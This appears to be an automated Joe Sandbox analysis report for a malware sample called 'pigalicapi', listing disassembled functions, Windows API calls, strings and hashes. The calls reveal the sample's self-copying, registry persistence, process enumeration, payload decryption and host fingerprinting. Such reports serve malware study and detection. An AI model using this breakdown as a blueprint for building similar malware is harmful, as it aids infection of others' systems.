                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                          • Opcode ID: 026133127a1bb0ea00659ab39868b60d9ed4483fef50e5810d7b5d5180fc85ed
                                                                                                                                                                                                                                                          • Instruction ID: 8b6fe25cd0b8e6eb481822b346abc035df4aca605d6cce9757367ec92a0cd2cd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 026133127a1bb0ea00659ab39868b60d9ed4483fef50e5810d7b5d5180fc85ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA410D75A44218EBDB24CB90DC55FDAB3BDBF48750F00C1E8E64997290DB709A82DFA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 592 a11120-a11134 593 a112bb-a112c1 592->593 594 a1113a-a1113e 592->594 594->593 595 a11144-a11150 lstrlenA 594->595 595->593 596 a11156-a11162 lstrlenA 595->596 596->593 597 a11168-a11175 596->597 598 a11177-a11188 GetAllUsersProfileDirectoryA 597->598 599 a1118a-a1119b GetEnvironmentVariableA 597->599 600 a111a1-a111d9 wnsprintfA lstrcmpiA 598->600 599->600 601 a11216-a11287 call a197a0 lstrcpyA * 2 CreateThread 600->601 602 a111db-a111e1 600->602 606 a112a3-a112b8 call a197c0 601->606 607 a11289-a1128d 601->607 602->601 603 a111e3-a11210 CopyFileA SetFileAttributesA lstrcpyA 602->603 603->601 606->593 608 a1129a-a112a1 607->608 609 a1128f-a11298 607->609 608->593 609->608
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A11148
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A1115A
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 00A11182
                                                                                                                                                                                                                                                            • Part of subcall function 00A197C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A197CF
                                                                                                                                                                                                                                                            • Part of subcall function 00A197C0: RtlFreeHeap.NTDLL(00000000), ref: 00A197D6
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 00A1119B
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 00A111BD
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 00A111D1
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 00A111F0
                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 00A111FF
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 00A11210
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 00A11249
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 00A1125D
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A112D0,00000000,00000000,00000000), ref: 00A11274
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                          • Opcode ID: 8a69c92bac36d5d2a4d89faaaa8b6f1dbb533b14376370bdb5793841c934d676
                                                                                                                                                                                                                                                          • Instruction ID: 9e363a770c06764b1a21c32fdee61a30e8526624792ffe15dfccf3b2f13da50d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a69c92bac36d5d2a4d89faaaa8b6f1dbb533b14376370bdb5793841c934d676
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1413DB5940218FBDB24DFE4DC89BDA77B9AF48710F04C198FA0996290D774DA85CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 726 a15a00-a15a12 727 a15b44-a15b4b 726->727 728 a15a18-a15a1c 726->728 728->727 729 a15a22-a15a26 728->729 729->727 730 a15a2c-a15a86 call a17d20 lstrcpyA call a15930 call a17d20 lstrlenA 729->730 730->727 737 a15a8c-a15ab9 lstrcpyA lstrlenA * 2 730->737 737->727 738 a15abf-a15b08 lstrcatA RegCreateKeyExA 737->738 739 a15b16-a15b31 call a17d20 lstrcpyA 738->739 740 a15b0a-a15b14 RegCloseKey 738->740 741 a15b37-a15b41 lstrlenA 739->741 740->741 741->727
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Gyifczkhyzuai,WDefault), ref: 00A15A47
                                                                                                                                                                                                                                                            • Part of subcall function 00A15930: CharUpperA.USER32(00000000), ref: 00A159E2
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00A1C4E0), ref: 00A15A7D
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,00A1C4E0), ref: 00A15A97
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A15AA1
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Gyifczkhyzuai), ref: 00A15AAE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Gyifczkhyzuai), ref: 00A15AC8
                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00A15B00
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00A15B0E
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 00A15B31
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00A15B3B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                          • String ID: Gyifczkhyzuai$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                          • API String ID: 4161867159-3645936388
                                                                                                                                                                                                                                                          • Opcode ID: a69d42d30cb3655597d4beaa14d7978cbb6d35605b26acc80ddcef5d1e60f3a7
                                                                                                                                                                                                                                                          • Instruction ID: 6a2e45d8c8a218320a815c5f87a475cbf1c1312436c97ab1aeb40f4194579c57
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69d42d30cb3655597d4beaa14d7978cbb6d35605b26acc80ddcef5d1e60f3a7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87316D75A84208FBDB10DFE4EC4AFEE3779AB48714F00C514FA199B281D7B4AA41CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 764 a11ca0-a11cc3 CreateToolhelp32Snapshot 765 a11e51-a11e57 764->765 766 a11cc9-a11ce8 Process32First 764->766 767 a11e44-a11e4b CloseHandle 766->767 768 a11cee-a11cfa GetCurrentProcessId 766->768 767->765 769 a11d04-a11d10 768->769 770 a11d20-a11d35 Process32Next 769->770 771 a11d12-a11d1e 769->771 770->769 772 a11d37-a11d3e 770->772 771->772 772->767 773 a11d44-a11d59 Process32First 772->773 773->767 774 a11d5f-a11d6b 773->774 775 a11d71-a11d81 lstrlenA 774->775 776 a11e29-a11e3e Process32Next 774->776 777 a11e27 775->777 778 a11d87-a11db9 lstrcpyA OpenProcess 775->778 776->767 776->774 777->767 778->777 779 a11dbb-a11de3 EnumProcessModules 778->779 780 a11e02-a11e11 GetProcessImageFileNameA 779->780 781 a11de5-a11e00 GetModuleFileNameExA 779->781 782 a11e16-a11e21 FindCloseChangeNotification 780->782 781->782 782->777
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A11CB1
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 00A11CE1
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00A11CEE
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(000000FF,00000128), ref: 00A11D2E
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 00A11D52
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128), ref: 00A11D78
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 00A11D92
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A11DA6
                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 00A11DDC
                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,00A1575B,00000000,?,00000004,00000000), ref: 00A11DFB
                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,00A1575B,00000000,?,00000004,00000000), ref: 00A11E11
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,00A1575B,00000000,?,00000004,00000000), ref: 00A11E21
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(000000FF,00000128), ref: 00A11E37
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00A11E4B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                          • Opcode ID: ff795db3ff22bdc4026ba8c6a557a150f3473cb12a74b197b31df5cfa845f9b0
                                                                                                                                                                                                                                                          • Instruction ID: 7a7853695596842bfcc2391e895acc8a0bd3395d16d7091169ec13a4c5e4f445
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff795db3ff22bdc4026ba8c6a557a150f3473cb12a74b197b31df5cfa845f9b0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C441FD75910218ABCB65DBA4CD95BEDB7B9AB48310F1041C8EA0DA7190D734AFC5CF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 00A15F67
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00A23FE2), ref: 00A15F7A
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00A13C58,00000000,000F003F,00000000), ref: 00A15FB3
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00A15FF2
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00A1603B
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A16045
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                          • Opcode ID: 3a40c32d026111ae61ac7e8bd8f99f312f165c3fed0868f9f208df864b74c0ae
                                                                                                                                                                                                                                                          • Instruction ID: 327b3848d240e7407f337783d0ee2f851405a69571b9c12b8429dab6fb001899
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a40c32d026111ae61ac7e8bd8f99f312f165c3fed0868f9f208df864b74c0ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB3164B594021CABDB24CFE0DC46FFEB778BB08704F048598FA05A6181D7B55A85CFA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 00A140AF
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A140C6
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 00A140E6
                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 00A140F7
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00A14101
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A14AC0,00000000,00000000,00000000), ref: 00A14118
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A141DD
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A14BA0,?,00000000,00000000), ref: 00A141F7
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A1420C
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 00A14216
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 00A142D1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                          • Opcode ID: 13ab2231501d14e5f2bd375b4605c588b4a128715fd0654e41992c90a90fb048
                                                                                                                                                                                                                                                          • Instruction ID: f6802b6f8d29e2c1d1b3324106cb2634713a004a5ca879bdd2c0cf16569190f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13ab2231501d14e5f2bd375b4605c588b4a128715fd0654e41992c90a90fb048
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E151D6B5A40308AFDB14DFD8D899BEDBBB6BF48714F104219F505AB290D770A981CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 00A1456C
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A1458B
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00A145AD
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A145D6
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A14617
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00A1463E
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A1482A
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: GetLastError.KERNEL32 ref: 00A14834
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A14850
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A148EB
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00A1490B
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00A1493C
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00A1496F
                                                                                                                                                                                                                                                            • Part of subcall function 00A147F0: CryptDestroyKey.ADVAPI32(00000000), ref: 00A14982
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A1468F
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A147C0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A147E0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                          • Opcode ID: bda17485fdca45ac4ac912762ed825b04a0907f964611e109c17cb5e9e9c9de1
                                                                                                                                                                                                                                                          • Instruction ID: 3466da09c54b8b123748c0d7a762fe8131cee0456f518efae2bba37889a1c760
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bda17485fdca45ac4ac912762ed825b04a0907f964611e109c17cb5e9e9c9de1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86817974A006289BCB24CB58DC94BEAB7B5AF49306F0091C9E508AB2C1D774AFC1CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000103), ref: 00A19D9A
                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 00A19DDD
                                                                                                                                                                                                                                                            • Part of subcall function 00A19F70: GetAdaptersInfo.IPHLPAPI(00000000,00A19E2D), ref: 00A19FEB
                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 00A19EF7
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 00A19F25
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 00A19F46
                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00A19F57
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 48986dacedaf8e50a7f9469646479c385ebf5bb010b16537aa6052546939de17
                                                                                                                                                                                                                                                          • Instruction ID: 8a7692153e34820e2ca216d65c9e5c696601666b8587d48cb3b0bdbaac27d7b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48986dacedaf8e50a7f9469646479c385ebf5bb010b16537aa6052546939de17
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6514870900328AFEB25CF50CD98BEAB7B9BB44300F1482D9E54DAA280DB709BC5CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 00A113C6
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00A113CD
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A1149E
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00A114A5
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A114EA
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00A114F1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                          • Opcode ID: d12d7a49f526eac0e4774b2643e90caff9f7314dc7adaf47dc5cd8fbff5898b8
                                                                                                                                                                                                                                                          • Instruction ID: 37190990ca077d8172c02ef32b98ae5356ab46e59b831750b9a9c083fa8deeea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d12d7a49f526eac0e4774b2643e90caff9f7314dc7adaf47dc5cd8fbff5898b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27416CB5D00209EFCB00CFE8D985BEE7BB5BF44315F108619EA25AB291D7349A85CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 00A179A3
                                                                                                                                                                                                                                                            • Part of subcall function 00A1A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 00A1A45C
                                                                                                                                                                                                                                                            • Part of subcall function 00A1A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A1A480
                                                                                                                                                                                                                                                            • Part of subcall function 00A1A400: RegCloseKey.KERNEL32(00000000), ref: 00A1A494
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A17AE3
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18AD3
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: GetLastError.KERNEL32 ref: 00A18ADD
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18B0C
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00A18B37
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A18B5E
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00A18B7A
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B87
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00A18B91
                                                                                                                                                                                                                                                            • Part of subcall function 00A18A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18B9D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A17A4B
                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 00A17A90
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 00A17ABC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                          • String ID: %s:%u$Balucergobw
                                                                                                                                                                                                                                                          • API String ID: 1891311255-1217149509
                                                                                                                                                                                                                                                          • Opcode ID: fad23b661ab35eeab8d47691227ae85d793ef8fab2b16795d7715361fe9ab65b
                                                                                                                                                                                                                                                          • Instruction ID: 72a4241b84e4ba1f91890dc0d149c148486b3e8e5c22b9c865b94b307175b7cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fad23b661ab35eeab8d47691227ae85d793ef8fab2b16795d7715361fe9ab65b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7414BB1E44208EBEB04DB98CD85FEEBBB5EF48704F108119E605BB281D7749A81CB64
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 00A15E7E
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00A15EB2
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 00A15ED6
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00A15F0B
